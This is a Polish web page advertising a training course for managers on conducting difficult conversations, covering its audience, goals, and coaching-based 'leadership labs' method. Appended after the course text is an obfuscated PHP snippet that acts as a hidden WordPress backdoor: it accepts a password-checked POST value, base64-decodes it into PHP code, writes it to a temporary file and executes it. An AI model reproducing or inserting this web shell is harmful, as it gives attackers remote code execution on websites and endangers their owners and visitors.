TRUDNE ROZMOWY

DLA KOGO?

Dla menedżerów wszystkich szczebli. Bo integralnym elementem ich roli jest podejmowanie trudnych/niewygodnych tematów w wielu obszarach: postawy, wartości, współpracy, wyników, efektywności, wdrażania zmian…w taki sposób, by powodować zmianę.

 

CEL:

Wzrost umiejętności prowadzenia „rozmów wyzwań”. Takich, które z różnych powodów są niewygodne i trudne i jednocześnie potrzebne, a czasem wręcz niezbędne.

Celem jest też przygotowanie się do konkretnej rozmowy czekającej menedżera.

 

O PROGRAMIE:

Zaczynamy krótko od roli menedżera w podważaniu status quo, konfrontowania zespołu czy organizacji z potrzebami zmian, czy wymaganiami i tego co uczestnicy rozumieją poprzez „trudną rozmowę”. Następnie uczymy jak dobrze rozpocząć (7 kroków rozpoczęcia trudnej rozmowy) i dalej już ćwiczymy na realnych, przygotowanych wcześniej przykładach uczestników jak takie rozmowy prowadzić.  Jest to okazja na korzystanie z całej wiedzy dotyczącej komunikacji, motywacji, radzenia sobie z oporem, budowania relacji partnerskich, itp. W miarę potrzeb uzupełniana jest ona adekwatnie podczas ćwiczeń. Każdy uczestnik ma 1h na swój case i wgląd od grupy i trenera.

Pracujemy metodą leadership labs polegającą na:

  • Pracy na prawdziwych wyzwaniach zawodowych i sytuacji w pracy
  • Wglądzie Grupy, która pomaga „właścicielowi” zobaczyć rozmowę wyzwanie z różnych punktów widzenia i dzieli się własnymi obserwacjami
  • pracy coachingowej (np. nie ma dobrych rad, wybór rozwiązań przez samego uczestnika).
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}